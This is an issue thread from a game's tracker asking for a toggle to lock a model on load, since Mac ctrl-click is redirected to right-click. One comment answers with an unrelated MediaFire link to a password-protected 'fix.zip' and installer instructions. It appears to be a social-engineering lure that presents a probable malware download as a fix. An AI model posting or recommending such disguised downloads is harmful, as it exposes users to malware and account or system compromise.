### ISSUE TITLE
Lock model on load 

### ISSUE THREAD

**Issue by Yeetano** [Eggs-D-Studios/wos-issues#303]
### Guidelines

- [X] I checked for duplicate suggestions
- [X] My suggestion intends to add or improve something

### Version

Main (Production)

### Topic

A game mechanic (e.g. a part, a feature, etc)

### Why are you making your suggestion?

Let’s Mac users lock models quickly.

### What do you propose? What should change, or what should be added?

Add a toggle to lock model on load or a toggle for ctrl click to lock build because Mac acting goofy and won’t let you ctrl click, it’s hardcoded to redirect to right click.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by placeholder00** [comment]
Please 💀🙏📿🤲
